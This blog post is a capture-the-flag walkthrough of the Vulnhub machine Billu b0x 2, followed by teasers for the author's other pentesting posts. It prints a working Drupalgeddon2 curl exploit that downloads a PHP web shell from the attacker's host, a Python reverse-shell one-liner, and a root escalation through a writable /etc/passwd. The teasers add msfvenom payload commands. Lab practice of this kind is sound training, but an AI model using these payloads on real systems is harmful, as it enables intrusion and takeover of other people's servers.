Skip to main content

Billu b0x 2 Walkthrough - Vulnhub Machine

Hello Friends,

This is my first boot2root writeup on a vuln machine made by my brother Manish Kishan Tanwar .
This machine is based on latest vulnerability of Drupal CMS.

Let's get started ...

Since port 80 was open , therefore I tried testing the webapp. After looking at the source code , it was clear that the website was running on a cms called drupal.I verified the version of drupal from changelog.txt.

The cms version of drupal used was 8.x. Suddenly something clicked my mind and I thought of giving a try for the famous drupalgeddon2 exploit.I tried exploiting through curl.

I used following command to download a php web shell -
curl -s -X 'POST'   --data 'mail[%23post_render][]=exec&mail[%23children]='"wget http://192.168.1.78/ninja.php"'&form_id=user_register_form'   'http://192.168.1.108/user/register?element_parents=account/mail/%23value&ajax_form=1' | cut -d ":" -f5


Through php shell , I got reverse shell on netcat by using python reverse shell command.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.78",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'



The reverse shell which I got  was not interactive and therefore I needed to spawn tty using-  python -c 'import pty;pty.spawn("bin/sh")' command 


I tried multiple things including running some kernel exploits etc. I found that /etc/passwd was having all the permissions and I was able to edit this file.I saw that there was a account present in /etc/passwd file with some encrypted hashes.I saw similar thing during my oscp lab and therefore tried adding my root password hash into passwd root user entry.


If a password hash is present in the second column in /etc/passwd, it takes precedence over the one in /etc/shadow and thus I was able to login as root .




Thanks for reading .Happy Hacking ;) 

Comments

Popular posts from this blog

Review of Pentester Academy - Attacking and Defending Active Directory Lab

Few months ago I didn't know what Active Directory is, and why should I care about it and never heard about ACL abuse and all. Although I had attended a BPAD (Breaking and Pwning Active Directory) training which was provided by Nullcon but I was not confident enough to go for this course exam, since my day-today activity involves VAPT stuffs related to Web/Network/Mobile and sometimes basic malware analysis (very basic one :p).  I started doing offshore lab and took help from some friends in understanding few Active Directory concepts. I did many silly mistakes during the lab and learned a lot. Meanwhile I registered for Active Directory Lab Course and got it in a discounted offer for first 50 students of about 11k INR  ( 1 mont lab access) :). Before wasting time any further let's dive into the review. The course -  https://www.pentesteracademy.com/activedirectorylab Certification - Certified Red Team Professional The Course Content  - After paying the course fee,

Brute Force Basic Authentication - PSP Assignment 0x1

Before we start I would like to bring your attention to this PSP course from Pentester Academy   - https://www.pentesteracademy.com/course?id=21 . The course is focused on Powershell scripting which can be used in pentesting activities. AGENDA  : 1. Introduction to Powershell 2. Basic Authentication lab setup 3. Brute-force Basic Authentication using Powershell Script -   - cmdlet   - IP,Port and word-list should be easily configurable 1.  Introduction to Powershell  -  Microsoft says- PowerShell is a task-based command-line shell and scripting language built on .NET. PowerShell helps system administrators and power-users rapidly automate tasks that manage operating systems (Linux, macOS, and Windows) and processes. PowerShell commands let you manage computers from the command line. PowerShell providers let you access data stores, such as the registry and certificate store, as easily as you access the file system. PowerShell includes a rich expression parser and a fu

Shellcode Analysis x86 - SLAE Assignment 0x5

Before we start , I would like to bring your attention to this SLAE course from securitytube which will help you learn Shellcoding -  http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ We all use metasploit in our daily pentest engagements so let's break-up some of the shellcode comes with metasploit. Analysis :  1. linux/x86/chmod  2. linux/x86/exec  3. linux/x86/read_file 1. linux/x86/chmod -   msfvenom -p linux/x86/chmod -f raw | ndisasm -u - msfvenom -p linux/x86/chmod -f c msfvenom -p linux/x86/chmod -f raw | sctest -vvv -Ss 100000 -G chmod.dot dot chmod.dot -Tpng -o chmod.png  2. linux/x86/exec -   msfvenom -p linux/x86/exec CMD=ls FILE=tmp.bin -f raw | ndisasm -u - msfvenom -p linux/x86/exec CMD=ls -f c msfvenom -p linux/x86/exec CMD=ls FILE=tmp.bin -f raw | /opt/libemu/bin/sctest -vvv -Ss 100000 -G exec.dot dot exec.dot -Tpng -o exec.png 3. linux/x86/read_file - msfvenom -p linux/x86/shell/revers